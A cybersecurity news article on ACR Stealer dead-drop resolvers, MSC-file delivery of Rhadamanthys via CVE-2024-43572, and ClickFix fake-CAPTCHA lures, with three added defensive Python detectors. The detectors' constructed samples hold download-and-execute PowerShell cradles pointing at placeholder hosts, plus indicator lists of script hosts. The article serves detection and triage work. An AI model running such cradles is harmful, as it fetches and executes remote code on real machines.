Cybersecurity researchers are warning of a new campaign that uses cracked versions of software as a lure to distribute information stealers such as Lumma and ACR Stealer.
The AhnLab Security Intelligence Center (ASEC) said it has observed a spike in the distribution volume of ACR Stealer since January 2025.
A notable aspect of the stealer is its use of a technique called a dead drop resolver to obtain the address of the actual command-and-control (C2) server. Rather than embedding the C2 in the binary, the malware relies on legitimate services such as Steam, Telegram's Telegraph, Google Forms and Google Slides to host it, so the first network contact looks like ordinary traffic to a trusted domain and the operator can rotate the C2 simply by editing the hosted page.
“Threat actors enter the actual C2 domain in Base64 encoding on a specific page,” ASEC said. “The malware accesses this page, parses the string, and obtains the actual C2 domain address to perform its malicious behavior.”
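The resolver logic ASEC describes can be run in reverse by an analyst: given a saved copy of the dead-drop page, find the Base64 tokens, decode them and keep whatever looks like a hostname. The following is an added example written for this page, not code from ASEC or from the malware; the sample page, the profile name and the decoded domains (`example-c2.invalid`, `c2.example`) are constructed, and the 12-character minimum token length and the assumption that the operator stores a bare domain or a URL are illustrative choices.

```python
import base64
import binascii
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample of a dead-drop page: an ordinary-looking profile page with a
# Base64 token embedded in the body text. The HTML, the user name, the surrounding
# text and the decoded domain (example-c2.invalid) are all invented for this example.
SAMPLE_PAGE = """<html><body>
<h1>Steam Community :: some-user</h1>
<p>thanks for visiting my profile, have a nice day</p>
<p class="profile_summary">config: ZXhhbXBsZS1jMi5pbnZhbGlk</p>
</body></html>"""

# Second constructed sample: the operator stored a full URL rather than a bare host.
SAMPLE_PAGE_URL = "<p>" + base64.b64encode(b"https://c2.example/gate").decode() + "</p>"

# Runs of Base64 alphabet characters (12 or more, optional padding) that are not
# glued to other Base64-looking characters. 12 is an arbitrary floor chosen to skip
# ordinary English words; a real resolver may look for a fixed marker instead.
B64_TOKEN_RE = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{12,}={0,2})(?![A-Za-z0-9+/=])")

# Dot-separated hostname labels with an alphabetic top-level label.
DOMAIN_RE = re.compile(
    r"^(?=.{4,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I
)


def decode_token(token: str) -> Optional[str]:
    """Strictly decode one Base64 token to ASCII text; None if it is not valid Base64/text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("ascii").strip()
    except UnicodeDecodeError:
        return None


def extract_c2_candidates(page: str) -> List[str]:
    """Return decoded Base64 tokens in `page` that look like a hostname (lower-cased, deduplicated).

    This mirrors what the stealer does (fetch page, find string, decode, use as C2),
    but is meant to be run by a defender over a saved copy of the page.
    """
    found: List[str] = []
    for match in B64_TOKEN_RE.finditer(page):
        text = decode_token(match.group(1))
        if not text:
            continue
        # Accept "https://host/path" as well as a bare host: keep only the host part.
        if text.lower().startswith(("http://", "https://")):
            text = urlsplit(text).hostname or ""
        text = text.lower()
        if DOMAIN_RE.match(text) and text not in found:
            found.append(text)
    return found


if __name__ == "__main__":
    for sample in (SAMPLE_PAGE, SAMPLE_PAGE_URL):
        for host in extract_c2_candidates(sample):
            print("candidate C2:", host)
```

The same loop works over a saved Telegraph post or a Google Forms page; the only parts that change in practice are the token floor and any fixed delimiter the operator uses, which is why the regex is kept separate from the decode-and-validate step.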
ACR Stealer, previously distributed via the Hijack Loader malware, can harvest a wide range of information from a compromised system, including files, web browser data and cryptocurrency wallet browser extensions.
Separately, ASEC disclosed another campaign that uses files with the .MSC extension, which are opened by the Microsoft Management Console (MMC), to deliver the Rhadamanthys stealer.
“There are two types of MSC malware: one exploits the apds.dll vulnerability (CVE-2024-43572), and the other executes the ‘command’ command using the Console Taskpad,” the South Korean company said.
“The MSC file is disguised as an MS Word document. When the ‘Open’ button is clicked, it downloads and executes a PowerShell script from an external source. The downloaded PowerShell script contains an EXE file (Rhadamanthys).”
CVE-2024-43572, also known as GrimResource, was first documented by Elastic Security Labs in June 2024 as being exploited as a zero-day by malicious actors. Microsoft patched it in October 2024.
Malware campaigns have also been observed abusing chat support platforms such as Zendesk, with attackers posing as customers to trick support agents into downloading a stealer.
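Both MSC variants ASEC describes leave a string-level trace in the file: a reference to apds.dll in the first case, and an embedded command line in the second. Since MSC console files are XML, a triage script can walk every element and attribute and flag those strings. The scanner below is an added example written for this page (not ASEC's or Elastic's tooling); the three sample files are constructed, the child element names in them (StringTable, Taskpad, Task, Command) are approximations of the console-file layout rather than copies of a real sample, and the indicator list is a starting point rather than a complete signature. The scanner walks every element, so it does not depend on those element names.

```python
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Indicators grouped by what they imply. The first group covers the CVE-2024-43572
# (GrimResource) variant; a console file has no ordinary reason to reference apds.dll.
# The second covers a command or script host embedded for a taskpad to launch.
INDICATORS: Dict[str, Tuple[str, ...]] = {
    "apds.dll reference (CVE-2024-43572)": ("apds.dll",),
    "embedded script/command": (
        "javascript:", "powershell", "pwsh", "cmd.exe", "cmd /c", "mshta",
        "wscript", "cscript", "rundll32", "regsvr32", "http://", "https://",
    ),
}

# Constructed samples (element names approximate; no real payload is reproduced).
SAMPLE_GRIMRESOURCE = """<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables><StringTable>
    <String ID="1">Invoice_2025.docx</String>
    <String ID="2">res://apds.dll/redirect.html</String>
  </StringTable></StringTables>
</MMC_ConsoleFile>"""

SAMPLE_TASKPAD = """<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <Taskpads><Taskpad Name="Open">
    <Task Name="Open">
      <Command>cmd.exe /c powershell -w hidden -c "iwr https://files.example/a.ps1 | iex"</Command>
    </Task>
  </Taskpad></Taskpads>
</MMC_ConsoleFile>"""

SAMPLE_BENIGN = """<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables><StringTable>
    <String ID="1">Event Viewer (Local)</String>
  </StringTable></StringTables>
</MMC_ConsoleFile>"""


def extract_strings(xml_text: str) -> List[Tuple[str, str]]:
    """Return (location, string) for every attribute value and non-empty text node.

    A malicious file may be deliberately malformed, so on a parse error the whole
    document is returned as one raw string rather than being skipped. For untrusted
    input in production, parse with defusedxml instead of xml.etree.
    """
    try:
        root = ET.fromstring(xml_text)
    except (ET.ParseError, ValueError):
        return [("raw", xml_text)]
    out: List[Tuple[str, str]] = []
    for elem in root.iter():
        for name, value in elem.attrib.items():
            out.append((f"{elem.tag}@{name}", value))
        if elem.text and elem.text.strip():
            out.append((elem.tag, elem.text.strip()))
    return out


def scan_msc(xml_text: str) -> Dict[str, List[str]]:
    """Map each indicator group that fires to the locations (and a text excerpt) where it fired."""
    findings: Dict[str, List[str]] = {}
    for location, value in extract_strings(xml_text):
        lowered = value.lower()
        for label, needles in INDICATORS.items():
            if any(n in lowered for n in needles):
                findings.setdefault(label, []).append(f"{location}: {value[:80]}")
    return findings


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            result = scan_msc(fh.read())
        print(path, "->", result or "no indicators")
```

Run it over any .msc attached to mail or dropped in a user's Downloads folder; a hit in either group is reason enough to pull the file, since a legitimately exported console will not reference apds.dll and rarely carries a script host on a taskpad command.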
According to a recent report published by Hudson Rock, more than 30,000,000 computers have been infected by information stealers over the last few years, resulting in the theft of corporate credentials and session cookies that cybercriminals then sell on underground forums to other actors for profit.
Buyers can weaponize the access these credentials provide to stage post-exploitation activity of their own, with serious consequences. These developments highlight the role of stealer malware as an initial access vector that provides a foothold into sensitive corporate environments.
“For $10 per log (computer), cybercriminals can buy stolen data from employees working in classified defense and military sectors,” Hudson Rock said. “Infostealer intelligence is not just about finding out who is infected; it is about understanding the full network of compromised credentials and third-party risks.”
Over the past year, threat actors have also stepped up efforts to spread various malware families, including stealers and remote access trojans (RATs), via a technique called ClickFix, which typically redirects users to fake CAPTCHA verification pages that instruct them to copy and execute a malicious PowerShell command.
One payload dropped this way is I2PRAT, which uses the I2P anonymizing network to hide its final C2 server.
“The malware is an advanced threat made of multiple layers, each containing refined mechanisms,” Sekoia said. “The use of an anonymization network complicates tracking and hinders identification of the threat's magnitude and spread in the wild.”
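The ClickFix flow leaves a characteristic process-creation trace: the user pastes the command into the Run box, so a script host is spawned by explorer.exe with a hidden window, a download-and-execute cradle, and often a trailing comment ("I am not a robot ...") so that the Run dialog shows reassuring text. The detector below is an added example written for this page, not a rule from any of the vendors cited; the four events are constructed in the shape of Sysmon Event ID 1 / Windows 4688 fields, the hostnames and paths are invented, the encoded command is built inline from a constructed string, and the weights and the threshold of 3 are illustrative choices.

```python
import base64
import binascii
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed encoded command: powershell -enc takes Base64 of UTF-16LE text.
ENCODED_PAYLOAD = base64.b64encode(
    "iwr https://captcha-check.example/s.ps1 | iex".encode("utf-16-le")
).decode()

# Constructed process-creation events; every path, host and command line is invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # ClickFix: pasted into Win+R, so explorer.exe is the parent, with the CAPTCHA tell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "iwr https://captcha-check.example/v.ps1 | iex"  # "I am not a robot - reCAPTCHA Verification ID: 7391"',
    },
    {   # ClickFix variant: cmd /c wrapper with an encoded command, no visible cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": f"cmd /c powershell -nop -w hidden -enc {ENCODED_PAYLOAD}",
    },
    {   # benign: administrator runs a script from a terminal
        "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\inventory.ps1",
    },
    {   # benign: scheduled task running a trivial command
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd /c echo hi",
    },
]

RUN_BOX_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
SUSPICIOUS_TOKENS = (
    "-w hidden", "-windowstyle hidden", "-nop", "-noprofile", "-enc", "-encodedcommand",
    "iex", "invoke-expression", "iwr", "invoke-webrequest", "irm", "invoke-restmethod",
    "downloadstring", "http://", "https://",
)
ENC_RE = re.compile(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# The social-engineering tell: a trailing comment that makes the Run box look harmless.
TELL_RE = re.compile(r"#.*\b(?:robot|captcha|verification|verify)\b", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Decode a -enc/-EncodedCommand argument (Base64 of UTF-16LE) or return ''."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        raw = base64.b64decode(match.group(1))
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16-le", errors="replace")


def analyze(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event for the ClickFix pattern and explain the score."""
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    haystack = (cmd + " " + decoded).lower()   # scan the decoded payload too
    score, reasons = 0, []
    if parent in RUN_BOX_PARENTS and image in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"{image} spawned by {parent} (Run box / Win+R pattern)")
    hits = [t for t in SUSPICIOUS_TOKENS if t in haystack]
    score += len(hits)
    reasons.extend(f"token: {t}" for t in hits)
    if TELL_RE.search(cmd):
        score += 2
        reasons.append("CAPTCHA-style comment appended to the command")
    return {"score": score, "reasons": reasons, "decoded": decoded}


def detect_clickfix(events: List[Dict[str, str]], threshold: int = 3) -> List[int]:
    """Indexes of events whose score reaches the threshold."""
    return [i for i, e in enumerate(events) if analyze(e)["score"] >= threshold]


if __name__ == "__main__":
    for i in detect_clickfix(SAMPLE_EVENTS):
        print(i, analyze(SAMPLE_EVENTS[i]))
```

On a live host the same pasted command also persists in the user's RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is worth collecting during triage even when process telemetry has rolled over. Decoding the -enc argument before matching is what catches the second sample; a rule that only inspects the visible command line would see nothing but flags and Base64.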